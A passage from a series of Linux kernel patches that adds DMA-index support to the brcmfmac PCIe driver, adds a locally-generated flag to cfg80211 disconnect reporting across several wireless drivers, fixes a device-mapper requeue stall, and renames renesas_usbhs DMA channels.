BRCMF_SHARED_DMA_RINGUPD_ADDR_OFFSET; From f3550aeb7fcd893a52ebf89a064fc95be57f29d1 Mon Sep 17 00:00:00 2001 From: Franky Lin Date: Wed, 20 May 2015 14:09:51 +0200 Subject: [PATCH 224/872] brcmfmac: add support for dma indices feature PCIe full dongle firmware can support a dma indices feature with which firmware can update/fetch the read/write indices of message buffer rings on both host to dongle and dongle to host directions. The support is announced by firmware through shared flags. Reviewed-by: Arend Van Spriel Reviewed-by: Pieter-Paul Giesberts Signed-off-by: Franky Lin Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- .../net/wireless/brcm80211/brcmfmac/pcie.c | 140 +++++++++++++++--- 1 file changed, 119 insertions(+), 21 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c index 2bc24a4e566b..37a2624d7bba 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/pcie.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/pcie.c @@ -115,6 +115,8 @@ enum brcmf_pcie_state { #define BRCMF_PCIE_MIN_SHARED_VERSION 5 #define BRCMF_PCIE_MAX_SHARED_VERSION 5 #define BRCMF_PCIE_SHARED_VERSION_MASK 0x00FF +#define BRCMF_PCIE_SHARED_DMA_INDEX 0x10000 +#define BRCMF_PCIE_SHARED_DMA_2B_IDX 0x100000 #define BRCMF_PCIE_FLAGS_HTOD_SPLIT 0x4000 #define BRCMF_PCIE_FLAGS_DTOH_SPLIT 0x8000 @@ -146,6 +148,10 @@ enum brcmf_pcie_state { #define BRCMF_SHARED_RING_H2D_R_IDX_PTR_OFFSET 8 #define BRCMF_SHARED_RING_D2H_W_IDX_PTR_OFFSET 12 #define BRCMF_SHARED_RING_D2H_R_IDX_PTR_OFFSET 16 +#define BRCMF_SHARED_RING_H2D_WP_HADDR_OFFSET 20 +#define BRCMF_SHARED_RING_H2D_RP_HADDR_OFFSET 28 +#define BRCMF_SHARED_RING_D2H_WP_HADDR_OFFSET 36 +#define BRCMF_SHARED_RING_D2H_RP_HADDR_OFFSET 44 #define BRCMF_SHARED_RING_TCM_MEMLOC_OFFSET 0 #define BRCMF_SHARED_RING_MAX_SUB_QUEUES 52 @@ -247,6 +253,13 @@ struct brcmf_pciedev_info { bool mbdata_completed; bool irq_allocated; bool wowl_enabled; + u8 dma_idx_sz; + void *idxbuf; + u32 idxbuf_sz; + dma_addr_t idxbuf_dmahandle; + u16 (*read_ptr)(struct brcmf_pciedev_info *devinfo, u32 mem_offset); + void (*write_ptr)(struct brcmf_pciedev_info *devinfo, u32 mem_offset, + u16 value); }; struct brcmf_pcie_ringbuf { @@ -323,6 +336,25 @@ brcmf_pcie_write_tcm16(struct brcmf_pciedev_info *devinfo, u32 mem_offset, } +static u16 +brcmf_pcie_read_idx(struct brcmf_pciedev_info *devinfo, u32 mem_offset) +{ + u16 *address = devinfo->idxbuf + mem_offset; + + return (*(address)); +} + + +static void +brcmf_pcie_write_idx(struct brcmf_pciedev_info *devinfo, u32 mem_offset, + u16 value) +{ + u16 *address = devinfo->idxbuf + mem_offset; + + *(address) = value; +} + + static u32 brcmf_pcie_read_tcm32(struct brcmf_pciedev_info *devinfo, u32 mem_offset) { @@ -868,7 +900,7 @@ static int brcmf_pcie_ring_mb_write_rptr(void *ctx) brcmf_dbg(PCIE, "W r_ptr %d (%d), ring %d\n", commonring->r_ptr, commonring->w_ptr, ring->id); - brcmf_pcie_write_tcm16(devinfo, ring->r_idx_addr, commonring->r_ptr); + devinfo->write_ptr(devinfo, ring->r_idx_addr, commonring->r_ptr); return 0; } @@ -886,7 +918,7 @@ static int brcmf_pcie_ring_mb_write_wptr(void *ctx) brcmf_dbg(PCIE, "W w_ptr %d (%d), ring %d\n", commonring->w_ptr, commonring->r_ptr, ring->id); - brcmf_pcie_write_tcm16(devinfo, ring->w_idx_addr, commonring->w_ptr); + devinfo->write_ptr(devinfo, ring->w_idx_addr, commonring->w_ptr); return 0; } @@ -915,7 +947,7 @@ static int brcmf_pcie_ring_mb_update_rptr(void *ctx) if (devinfo->state != BRCMFMAC_PCIE_STATE_UP) return -EIO; - commonring->r_ptr = brcmf_pcie_read_tcm16(devinfo, ring->r_idx_addr); + commonring->r_ptr = devinfo->read_ptr(devinfo, ring->r_idx_addr); brcmf_dbg(PCIE, "R r_ptr %d (%d), ring %d\n", commonring->r_ptr, commonring->w_ptr, ring->id); @@ -933,7 +965,7 @@ static int brcmf_pcie_ring_mb_update_wptr(void *ctx) if (devinfo->state != BRCMFMAC_PCIE_STATE_UP) return -EIO; - commonring->w_ptr = brcmf_pcie_read_tcm16(devinfo, ring->w_idx_addr); + commonring->w_ptr = devinfo->read_ptr(devinfo, ring->w_idx_addr); brcmf_dbg(PCIE, "R w_ptr %d (%d), ring %d\n", commonring->w_ptr, commonring->r_ptr, ring->id); @@ -1038,6 +1070,13 @@ static void brcmf_pcie_release_ringbuffers(struct brcmf_pciedev_info *devinfo) } kfree(devinfo->shared.flowrings); devinfo->shared.flowrings = NULL; + if (devinfo->idxbuf) { + dma_free_coherent(&devinfo->pdev->dev, + devinfo->idxbuf_sz, + devinfo->idxbuf, + devinfo->idxbuf_dmahandle); + devinfo->idxbuf = NULL; + } } @@ -1053,19 +1092,72 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo) u32 addr; u32 ring_mem_ptr; u32 i; + u64 address; + u32 bufsz; u16 max_sub_queues; + u8 idx_offset; ring_addr = devinfo->shared.ring_info_addr; brcmf_dbg(PCIE, "Base ring addr = 0x%08x\n", ring_addr); + addr = ring_addr + BRCMF_SHARED_RING_MAX_SUB_QUEUES; + max_sub_queues = brcmf_pcie_read_tcm16(devinfo, addr); + + if (devinfo->dma_idx_sz != 0) { + bufsz = (BRCMF_NROF_D2H_COMMON_MSGRINGS + max_sub_queues) * + devinfo->dma_idx_sz * 2; + devinfo->idxbuf = dma_alloc_coherent(&devinfo->pdev->dev, bufsz, + &devinfo->idxbuf_dmahandle, + GFP_KERNEL); + if (!devinfo->idxbuf) + devinfo->dma_idx_sz = 0; + } - addr = ring_addr + BRCMF_SHARED_RING_D2H_W_IDX_PTR_OFFSET; - d2h_w_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); - addr = ring_addr + BRCMF_SHARED_RING_D2H_R_IDX_PTR_OFFSET; - d2h_r_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); - addr = ring_addr + BRCMF_SHARED_RING_H2D_W_IDX_PTR_OFFSET; - h2d_w_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); - addr = ring_addr + BRCMF_SHARED_RING_H2D_R_IDX_PTR_OFFSET; - h2d_r_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); + if (devinfo->dma_idx_sz == 0) { + addr = ring_addr + BRCMF_SHARED_RING_D2H_W_IDX_PTR_OFFSET; + d2h_w_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); + addr = ring_addr + BRCMF_SHARED_RING_D2H_R_IDX_PTR_OFFSET; + d2h_r_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); + addr = ring_addr + BRCMF_SHARED_RING_H2D_W_IDX_PTR_OFFSET; + h2d_w_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); + addr = ring_addr + BRCMF_SHARED_RING_H2D_R_IDX_PTR_OFFSET; + h2d_r_idx_ptr = brcmf_pcie_read_tcm32(devinfo, addr); + idx_offset = sizeof(u32); + devinfo->write_ptr = brcmf_pcie_write_tcm16; + devinfo->read_ptr = brcmf_pcie_read_tcm16; + brcmf_dbg(PCIE, "Using TCM indices\n"); + } else { + memset(devinfo->idxbuf, 0, bufsz); + devinfo->idxbuf_sz = bufsz; + idx_offset = devinfo->dma_idx_sz; + devinfo->write_ptr = brcmf_pcie_write_idx; + devinfo->read_ptr = brcmf_pcie_read_idx; + + h2d_w_idx_ptr = 0; + addr = ring_addr + BRCMF_SHARED_RING_H2D_WP_HADDR_OFFSET; + address = (u64)devinfo->idxbuf_dmahandle; + brcmf_pcie_write_tcm32(devinfo, addr, address & 0xffffffff); + brcmf_pcie_write_tcm32(devinfo, addr + 4, address >> 32); + + h2d_r_idx_ptr = h2d_w_idx_ptr + max_sub_queues * idx_offset; + addr = ring_addr + BRCMF_SHARED_RING_H2D_RP_HADDR_OFFSET; + address += max_sub_queues * idx_offset; + brcmf_pcie_write_tcm32(devinfo, addr, address & 0xffffffff); + brcmf_pcie_write_tcm32(devinfo, addr + 4, address >> 32); + + d2h_w_idx_ptr = h2d_r_idx_ptr + max_sub_queues * idx_offset; + addr = ring_addr + BRCMF_SHARED_RING_D2H_WP_HADDR_OFFSET; + address += max_sub_queues * idx_offset; + brcmf_pcie_write_tcm32(devinfo, addr, address & 0xffffffff); + brcmf_pcie_write_tcm32(devinfo, addr + 4, address >> 32); + + d2h_r_idx_ptr = d2h_w_idx_ptr + + BRCMF_NROF_D2H_COMMON_MSGRINGS * idx_offset; + addr = ring_addr + BRCMF_SHARED_RING_D2H_RP_HADDR_OFFSET; + address += BRCMF_NROF_D2H_COMMON_MSGRINGS * idx_offset; + brcmf_pcie_write_tcm32(devinfo, addr, address & 0xffffffff); + brcmf_pcie_write_tcm32(devinfo, addr + 4, address >> 32); + brcmf_dbg(PCIE, "Using host memory indices\n"); + } addr = ring_addr + BRCMF_SHARED_RING_TCM_MEMLOC_OFFSET; ring_mem_ptr = brcmf_pcie_read_tcm32(devinfo, addr); @@ -1079,8 +1171,8 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo) ring->id = i; devinfo->shared.commonrings[i] = ring; - h2d_w_idx_ptr += sizeof(u32); - h2d_r_idx_ptr += sizeof(u32); + h2d_w_idx_ptr += idx_offset; + h2d_r_idx_ptr += idx_offset; ring_mem_ptr += BRCMF_RING_MEM_SZ; } @@ -1094,13 +1186,11 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo) ring->id = i; devinfo->shared.commonrings[i] = ring; - d2h_w_idx_ptr += sizeof(u32); - d2h_r_idx_ptr += sizeof(u32); + d2h_w_idx_ptr += idx_offset; + d2h_r_idx_ptr += idx_offset; ring_mem_ptr += BRCMF_RING_MEM_SZ; } - addr = ring_addr + BRCMF_SHARED_RING_MAX_SUB_QUEUES; - max_sub_queues = brcmf_pcie_read_tcm16(devinfo, addr); devinfo->shared.nrof_flowrings = max_sub_queues - BRCMF_NROF_H2D_COMMON_MSGRINGS; rings = kcalloc(devinfo->shared.nrof_flowrings, sizeof(*ring), @@ -1124,15 +1214,15 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo) ring); ring->w_idx_addr = h2d_w_idx_ptr; ring->r_idx_addr = h2d_r_idx_ptr; - h2d_w_idx_ptr += sizeof(u32); - h2d_r_idx_ptr += sizeof(u32); + h2d_w_idx_ptr += idx_offset; + h2d_r_idx_ptr += idx_offset; } devinfo->shared.flowrings = rings; return 0; fail: - brcmf_err("Allocating commonring buffers failed\n"); + brcmf_err("Allocating ring buffers failed\n"); brcmf_pcie_release_ringbuffers(devinfo); return -ENOMEM; } @@ -1269,6 +1359,14 @@ brcmf_pcie_init_share_ram_info(struct brcmf_pciedev_info *devinfo, return -EINVAL; } + /* check firmware support dma indicies */ + if (shared->flags & BRCMF_PCIE_SHARED_DMA_INDEX) { + if (shared->flags & BRCMF_PCIE_SHARED_DMA_2B_IDX) + devinfo->dma_idx_sz = sizeof(u16); + else + devinfo->dma_idx_sz = sizeof(u32); + } + addr = sharedram_addr + BRCMF_SHARED_MAX_RXBUFPOST_OFFSET; shared->max_rxbufpost = brcmf_pcie_read_tcm16(devinfo, addr); if (shared->max_rxbufpost == 0) From 80279fb7ba5b71981a60988b0307afa43f78f6b1 Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Fri, 22 May 2015 16:22:20 +0200 Subject: [PATCH 225/872] cfg80211: properly send NL80211_ATTR_DISCONNECTED_BY_AP in disconnect When we disconnect from the AP, drivers call cfg80211_disconnect(). This doesn't know whether the disconnection was initiated locally or by the AP though, which can cause problems with the supplicant, for example with WPS. This issue obviously doesn't show up with any mac80211 based driver since mac80211 doesn't call this function. Fix this by requiring drivers to indicate whether the disconnect is locally generated or not. I've tried to update the drivers, but may not have gotten the values correct, and some drivers may currently not be able to report correct values. In case of doubt I left it at false, which is the current behaviour. For libertas, make adjustments as indicated by Dan Williams. Reported-by: Matthieu Mauger Tested-by: Matthieu Mauger Signed-off-by: Johannes Berg --- drivers/net/wireless/ath/ath6kl/cfg80211.c | 4 ++-- drivers/net/wireless/ath/wil6210/main.c | 2 +- drivers/net/wireless/brcm80211/brcmfmac/cfg80211.c | 4 ++-- drivers/net/wireless/libertas/cfg.c | 13 ++++++------- drivers/net/wireless/libertas/cfg.h | 3 ++- drivers/net/wireless/libertas/cmd.h | 3 ++- drivers/net/wireless/libertas/cmdresp.c | 13 ++++++++----- drivers/net/wireless/mwifiex/join.c | 2 +- drivers/net/wireless/mwifiex/sta_event.c | 2 +- drivers/net/wireless/rndis_wlan.c | 2 +- drivers/staging/rtl8723au/os_dep/ioctl_cfg80211.c | 2 +- drivers/staging/wlan-ng/cfg80211.c | 2 +- include/net/cfg80211.h | 4 +++- net/wireless/core.h | 1 + net/wireless/sme.c | 4 +++- net/wireless/util.c | 3 ++- 16 files changed, 37 insertions(+), 27 deletions(-) diff --git a/drivers/net/wireless/ath/ath6kl/cfg80211.c b/drivers/net/wireless/ath/ath6kl/cfg80211.c index cce4625a53ad..a511ef3614b9 100644 --- a/drivers/net/wireless/ath/ath6kl/cfg80211.c +++ b/drivers/net/wireless/ath/ath6kl/cfg80211.c @@ -889,7 +889,7 @@ void ath6kl_cfg80211_disconnect_event(struct ath6kl_vif *vif, u8 reason, GFP_KERNEL); } else if (vif->sme_state == SME_CONNECTED) { cfg80211_disconnected(vif->ndev, proto_reason, - NULL, 0, GFP_KERNEL); + NULL, 0, false, GFP_KERNEL); } vif->sme_state = SME_DISCONNECTED; @@ -3467,7 +3467,7 @@ void ath6kl_cfg80211_stop(struct ath6kl_vif *vif) GFP_KERNEL); break; case SME_CONNECTED: - cfg80211_disconnected(vif->ndev, 0, NULL, 0, GFP_KERNEL); + cfg80211_disconnected(vif->ndev, 0, NULL, 0, true, GFP_KERNEL); break; } diff --git a/drivers/net/wireless/ath/wil6210/main.c b/drivers/net/wireless/ath/wil6210/main.c index c2a238426425..38b953e108a7 100644 --- a/drivers/net/wireless/ath/wil6210/main.c +++ b/drivers/net/wireless/ath/wil6210/main.c @@ -224,7 +224,7 @@ static void _wil6210_disconnect(struct wil6210_priv *wil, const u8 *bssid, if (test_bit(wil_status_fwconnected, wil->status)) { clear_bit(wil_status_fwconnected, wil->status); cfg80211_disconnected(ndev, reason_code, - NULL, 0, GFP_KERNEL); + NULL, 0, false, GFP_KERNEL); } else if (test_bit(wil_status_fwconnecting, wil->status)) { cfg80211_connect_result(ndev, bssid, NULL, 0, NULL, 0, WLAN_STATUS_UNSPECIFIED_FAILURE, diff --git a/drivers/net/wireless/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/brcm80211/brcmfmac/cfg80211.c index 8a15ebbce4a3..2e4e42245b8f 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/cfg80211.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/cfg80211.c @@ -1262,7 +1262,7 @@ static void brcmf_link_down(struct brcmf_cfg80211_vif *vif, u16 reason) } clear_bit(BRCMF_VIF_STATUS_CONNECTED, &vif->sme_state); cfg80211_disconnected(vif->wdev.netdev, reason, NULL, 0, - GFP_KERNEL); + true, GFP_KERNEL); } clear_bit(BRCMF_VIF_STATUS_CONNECTING, &vif->sme_state); @@ -1928,7 +1928,7 @@ brcmf_cfg80211_disconnect(struct wiphy *wiphy, struct net_device *ndev, clear_bit(BRCMF_VIF_STATUS_CONNECTED, &ifp->vif->sme_state); clear_bit(BRCMF_VIF_STATUS_CONNECTING, &ifp->vif->sme_state); - cfg80211_disconnected(ndev, reason_code, NULL, 0, GFP_KERNEL); + cfg80211_disconnected(ndev, reason_code, NULL, 0, true, GFP_KERNEL); memcpy(&scbval.ea, &profile->bssid, ETH_ALEN); scbval.val = cpu_to_le32(reason_code); diff --git a/drivers/net/wireless/libertas/cfg.c b/drivers/net/wireless/libertas/cfg.c index 1a4d558022d8..8317afd065b4 100644 --- a/drivers/net/wireless/libertas/cfg.c +++ b/drivers/net/wireless/libertas/cfg.c @@ -835,14 +835,13 @@ static int lbs_cfg_scan(struct wiphy *wiphy, * Events */ -void lbs_send_disconnect_notification(struct lbs_private *priv) +void lbs_send_disconnect_notification(struct lbs_private *priv, + bool locally_generated) { lbs_deb_enter(LBS_DEB_CFG80211); - cfg80211_disconnected(priv->dev, - 0, - NULL, 0, - GFP_KERNEL); + cfg80211_disconnected(priv->dev, 0, NULL, 0, locally_generated, + GFP_KERNEL); lbs_deb_leave(LBS_DEB_CFG80211); } @@ -1458,7 +1457,7 @@ int lbs_disconnect(struct lbs_private *priv, u16 reason) cfg80211_disconnected(priv->dev, reason, - NULL, 0, + NULL, 0, true, GFP_KERNEL); priv->connect_status = LBS_DISCONNECTED; @@ -2031,7 +2030,7 @@ static int lbs_leave_ibss(struct wiphy *wiphy, struct net_device *dev) ret = lbs_cmd_with_response(priv, CMD_802_11_AD_HOC_STOP, &cmd); /* TODO: consider doing this at MACREG_INT_CODE_ADHOC_BCN_LOST time */ - lbs_mac_event_disconnected(priv); + lbs_mac_event_disconnected(priv, true); lbs_deb_leave_args(LBS_DEB_CFG80211, "ret %d", ret); return ret; diff --git a/drivers/net/wireless/libertas/cfg.h b/drivers/net/wireless/libertas/cfg.h index 10995f59fe34..acccc2922401 100644 --- a/drivers/net/wireless/libertas/cfg.h +++ b/drivers/net/wireless/libertas/cfg.h @@ -10,7 +10,8 @@ struct wireless_dev *lbs_cfg_alloc(struct device *dev); int lbs_cfg_register(struct lbs_private *priv); void lbs_cfg_free(struct lbs_private *priv); -void lbs_send_disconnect_notification(struct lbs_private *priv); +void lbs_send_disconnect_notification(struct lbs_private *priv, + bool locally_generated); void lbs_send_mic_failureevent(struct lbs_private *priv, u32 event); void lbs_scan_done(struct lbs_private *priv); diff --git a/drivers/net/wireless/libertas/cmd.h b/drivers/net/wireless/libertas/cmd.h index 4279e8ab95f2..0c5444b02c64 100644 --- a/drivers/net/wireless/libertas/cmd.h +++ b/drivers/net/wireless/libertas/cmd.h @@ -68,7 +68,8 @@ int lbs_process_command_response(struct lbs_private *priv, u8 *data, u32 len); /* From cmdresp.c */ -void lbs_mac_event_disconnected(struct lbs_private *priv); +void lbs_mac_event_disconnected(struct lbs_private *priv, + bool locally_generated); diff --git a/drivers/net/wireless/libertas/cmdresp.c b/drivers/net/wireless/libertas/cmdresp.c index 65f18f1e869c..e5442e8956f7 100644 --- a/drivers/net/wireless/libertas/cmdresp.c +++ b/drivers/net/wireless/libertas/cmdresp.c @@ -19,10 +19,13 @@ * reset link state etc. * * @priv: A pointer to struct lbs_private structure + * @locally_generated: indicates disconnect was requested locally + * (usually by userspace) * * returns: n/a */ -void lbs_mac_event_disconnected(struct lbs_private *priv) +void lbs_mac_event_disconnected(struct lbs_private *priv, + bool locally_generated) { if (priv->connect_status != LBS_CONNECTED) return; @@ -36,7 +39,7 @@ void lbs_mac_event_disconnected(struct lbs_private *priv) msleep_interruptible(1000); if (priv->wdev->iftype == NL80211_IFTYPE_STATION) - lbs_send_disconnect_notification(priv); + lbs_send_disconnect_notification(priv, locally_generated); /* report disconnect to upper layer */ netif_stop_queue(priv->dev); @@ -229,17 +232,17 @@ int lbs_process_event(struct lbs_private *priv, u32 event) case MACREG_INT_CODE_DEAUTHENTICATED: lbs_deb_cmd("EVENT: deauthenticated\n"); - lbs_mac_event_disconnected(priv); + lbs_mac_event_disconnected(priv, false); break; case MACREG_INT_CODE_DISASSOCIATED: lbs_deb_cmd("EVENT: disassociated\n"); - lbs_mac_event_disconnected(priv); + lbs_mac_event_disconnected(priv, false); break; case MACREG_INT_CODE_LINK_LOST_NO_SCAN: lbs_deb_cmd("EVENT: link lost\n"); - lbs_mac_event_disconnected(priv); + lbs_mac_event_disconnected(priv, true); break; case MACREG_INT_CODE_PS_SLEEP: diff --git a/drivers/net/wireless/mwifiex/join.c b/drivers/net/wireless/mwifiex/join.c index 411a6c2f4aca..080ec3422db9 100644 --- a/drivers/net/wireless/mwifiex/join.c +++ b/drivers/net/wireless/mwifiex/join.c @@ -1421,7 +1421,7 @@ int mwifiex_deauthenticate(struct mwifiex_private *priv, u8 *mac) ret = mwifiex_deauthenticate_infra(priv, mac); if (ret) cfg80211_disconnected(priv->netdev, 0, NULL, 0, - GFP_KERNEL); + true, GFP_KERNEL); break; case NL80211_IFTYPE_ADHOC: return mwifiex_send_cmd(priv, HostCmd_CMD_802_11_AD_HOC_STOP, diff --git a/drivers/net/wireless/mwifiex/sta_event.c b/drivers/net/wireless/mwifiex/sta_event.c index 0dc7a1d3993d..c9064b88d6a4 100644 --- a/drivers/net/wireless/mwifiex/sta_event.c +++ b/drivers/net/wireless/mwifiex/sta_event.c @@ -133,7 +133,7 @@ mwifiex_reset_connect_state(struct mwifiex_private *priv, u16 reason_code) if (priv->bss_mode == NL80211_IFTYPE_STATION || priv->bss_mode == NL80211_IFTYPE_P2P_CLIENT) { cfg80211_disconnected(priv->netdev, reason_code, NULL, 0, - GFP_KERNEL); + false, GFP_KERNEL); } eth_zero_addr(priv->cfg_bssid); diff --git a/drivers/net/wireless/rndis_wlan.c b/drivers/net/wireless/rndis_wlan.c index d72ff8e7125d..43db6976102f 100644 --- a/drivers/net/wireless/rndis_wlan.c +++ b/drivers/net/wireless/rndis_wlan.c @@ -2861,7 +2861,7 @@ static void rndis_wlan_do_link_down_work(struct usbnet *usbdev) deauthenticate(usbdev); - cfg80211_disconnected(usbdev->net, 0, NULL, 0, GFP_KERNEL); + cfg80211_disconnected(usbdev->net, 0, NULL, 0, true, GFP_KERNEL); } netif_carrier_off(usbdev->net); diff --git a/drivers/staging/rtl8723au/os_dep/ioctl_cfg80211.c b/drivers/staging/rtl8723au/os_dep/ioctl_cfg80211.c index bc95ce89af06..5ab2f6978209 100644 --- a/drivers/staging/rtl8723au/os_dep/ioctl_cfg80211.c +++ b/drivers/staging/rtl8723au/os_dep/ioctl_cfg80211.c @@ -379,7 +379,7 @@ void rtw_cfg80211_indicate_disconnect(struct rtw_adapter *padapter) GFP_ATOMIC); } else { cfg80211_disconnected(padapter->pnetdev, 0, NULL, - 0, GFP_ATOMIC); + 0, false, GFP_ATOMIC); } } } diff --git a/drivers/staging/wlan-ng/cfg80211.c b/drivers/staging/wlan-ng/cfg80211.c index 7c87aecf4744..342e2b30c48f 100644 --- a/drivers/staging/wlan-ng/cfg80211.c +++ b/drivers/staging/wlan-ng/cfg80211.c @@ -722,7 +722,7 @@ void prism2_connect_result(wlandevice_t *wlandev, u8 failed) void prism2_disconnected(wlandevice_t *wlandev) { cfg80211_disconnected(wlandev->netdev, 0, NULL, - 0, GFP_KERNEL); + 0, false, GFP_KERNEL); } void prism2_roamed(wlandevice_t *wlandev) diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h index d63ecec73090..a741678f24a2 100644 --- a/include/net/cfg80211.h +++ b/include/net/cfg80211.h @@ -4575,13 +4575,15 @@ void cfg80211_roamed_bss(struct net_device *dev, struct cfg80211_bss *bss, * @ie: information elements of the deauth/disassoc frame (may be %NULL) * @ie_len: length of IEs * @reason: reason code for the disconnection, set it to 0 if unknown + * @locally_generated: disconnection was requested locally * @gfp: allocation flags * * After it calls this function, the driver should enter an idle state * and not try to connect to any AP any more. */ void cfg80211_disconnected(struct net_device *dev, u16 reason, - const u8 *ie, size_t ie_len, gfp_t gfp); + const u8 *ie, size_t ie_len, + bool locally_generated, gfp_t gfp); /** * cfg80211_ready_on_channel - notification of remain_on_channel start diff --git a/net/wireless/core.h b/net/wireless/core.h index 801cd49c5a0c..311eef26bf88 100644 --- a/net/wireless/core.h +++ b/net/wireless/core.h @@ -222,6 +222,7 @@ struct cfg80211_event { const u8 *ie; size_t ie_len; u16 reason; + bool locally_generated; } dc; struct { u8 bssid[ETH_ALEN]; diff --git a/net/wireless/sme.c b/net/wireless/sme.c index d11454f87bac..8020b5b094d4 100644 --- a/net/wireless/sme.c +++ b/net/wireless/sme.c @@ -938,7 +938,8 @@ void __cfg80211_disconnected(struct net_device *dev, const u8 *ie, } void cfg80211_disconnected(struct net_device *dev, u16 reason, - const u8 *ie, size_t ie_len, gfp_t gfp) + const u8 *ie, size_t ie_len, + bool locally_generated, gfp_t gfp) { struct wireless_dev *wdev = dev->ieee80211_ptr; struct cfg80211_registered_device *rdev = wiphy_to_rdev(wdev->wiphy); @@ -954,6 +955,7 @@ void cfg80211_disconnected(struct net_device *dev, u16 reason, ev->dc.ie_len = ie_len; memcpy((void *)ev->dc.ie, ie, ie_len); ev->dc.reason = reason; + ev->dc.locally_generated = locally_generated; spin_lock_irqsave(&wdev->event_lock, flags); list_add_tail(&ev->list, &wdev->event_list); diff --git a/net/wireless/util.c b/net/wireless/util.c index 70051ab52f4f..4cb34557b873 100644 --- a/net/wireless/util.c +++ b/net/wireless/util.c @@ -887,7 +887,8 @@ void cfg80211_process_wdev_events(struct wireless_dev *wdev) case EVENT_DISCONNECTED: __cfg80211_disconnected(wdev->netdev, ev->dc.ie, ev->dc.ie_len, - ev->dc.reason, true); + ev->dc.reason, + !ev->dc.locally_generated); break; case EVENT_IBSS_JOINED: __cfg80211_ibss_joined(wdev->netdev, ev->ij.bssid, From 4ae9944d132b160d444fa3aa875307eb0fa3eeec Mon Sep 17 00:00:00 2001 From: Junichi Nomura Date: Tue, 26 May 2015 08:25:54 +0000 Subject: [PATCH 226/872] dm: run queue on re-queue Without kicking queue, requeued request may stay forever in the queue if there are no other I/O activities to the device. The original error had been in v2.6.39 with commit 7eaceaccab5f ("block: remove per-queue plugging"), which replaced conditional plugging by periodic runqueue. Commit 9d1deb83d489 in v4.1-rc1 removed the periodic runqueue and the problem started to manifest. Fixes: 9d1deb83d489 ("dm: don't schedule delayed run of the queue if nothing to do") Signed-off-by: Jun'ichi Nomura Signed-off-by: Mike Snitzer --- drivers/md/dm.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index a930b72314ac..0bf79a0bad37 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -1164,6 +1164,7 @@ static void old_requeue_request(struct request *rq) spin_lock_irqsave(q->queue_lock, flags); blk_requeue_request(q, rq); + blk_run_queue_async(q); spin_unlock_irqrestore(q->queue_lock, flags); } From 7cc99f1e9ae0e657c9a9126d042a342ea786ef08 Mon Sep 17 00:00:00 2001 From: Yoshihiro Shimoda Date: Wed, 8 Apr 2015 19:42:24 +0900 Subject: [PATCH 227/872] usb: renesas_usbhs: Revise the binding document about the dma-names Since the DT should describe the hardware (not the driver limitation), This patch revises the binding document about the dma-names to change simple numbering as "ch%d" instead of "tx" and "rx". Also this patch fixes the actual code of renesas_usbhs driver to handle the new dma-names. Signed-off-by: Yoshihiro Shimoda Acked-by: Mark Rutland Acked-by: Geert Uytterhoeven Signed-off-by: Felipe Balbi --- .../devicetree/bindings/usb/renesas_usbhs.txt | 6 ++--- drivers/usb/renesas_usbhs/fifo.c | 24 ++++++++++++------- 2 files changed, 17 insertions(+), 13 deletions(-) diff --git a/Documentation/devicetree/bindings/usb/renesas_usbhs.txt b/Documentation/devicetree/bindings/usb/renesas_usbhs.txt index dc2a18f0b3a1..ddbe304beb21 100644 --- a/Documentation/devicetree/bindings/usb/renesas_usbhs.txt +++ b/Documentation/devicetree/bindings/usb/renesas_usbhs.txt @@ -15,10 +15,8 @@ Optional properties: - phys: phandle + phy specifier pair - phy-names: must be "usb" - dmas: Must contain a list of references to DMA specifiers. - - dma-names : Must contain a list of DMA names: - - tx0 ... tx - - rx0 ... rx - - This means DnFIFO in USBHS module. + - dma-names : named "ch%d", where %d is the channel number ranging from zero + to the number of channels (DnFIFOs) minus one. Example: usbhs: usb@e6590000 { diff --git a/drivers/usb/renesas_usbhs/fifo.c b/drivers/usb/renesas_usbhs/fifo.c index 8597cf9cfceb..bc23b4a2c415 100644 --- a/drivers/usb/renesas_usbhs/fifo.c +++ b/drivers/usb/renesas_usbhs/fifo.c @@ -1227,15 +1227,21 @@ static void usbhsf_dma_init_dt(struct device *dev, struct usbhs_fifo *fifo, { char name[16]; - snprintf(name, sizeof(name), "tx%d", channel); - fifo->tx_chan = dma_request_slave_channel_reason(dev, name); - if (IS_ERR(fifo->tx_chan)) - fifo->tx_chan = NULL; - - snprintf(name, sizeof(name), "rx%d", channel); - fifo->rx_chan = dma_request_slave_channel_reason(dev, name); - if (IS_ERR(fifo->rx_chan)) - fifo->rx_chan = NULL; + /* + * To avoid complex handing for DnFIFOs, the driver uses each + * DnFIFO as TX or RX direction (not bi-direction). + * So, the driver uses odd channels for TX, even channels for RX. + */ + snprintf(name, sizeof(name), "ch%d", channel); + if (channel & 1) { + fifo->tx_chan = dma_request_slave_channel_reason(dev, name); + if (IS_ERR(fifo->tx_chan)) + fifo->tx_chan = NULL; + } else { + fifo->rx_chan = dma_request_slave_channel_reason(dev, name); + if (IS_ERR(fifo->rx_chan)) + fifo->rx_chan = NULL; + } } static void usbhsf_dma_init(struct usbhs_priv *priv, struct usbhs_fifo *fifo, From 2b12978928e902d234104b24f589bbe38909fad7 Mon Sep 17 00:00:00 2001 From: Fabio Estevam Date: Fri, 22 May 2015 23:28:15 -0300 Subject: [PATCH 228/872] usb: phy: ab8500-usb: Pass the 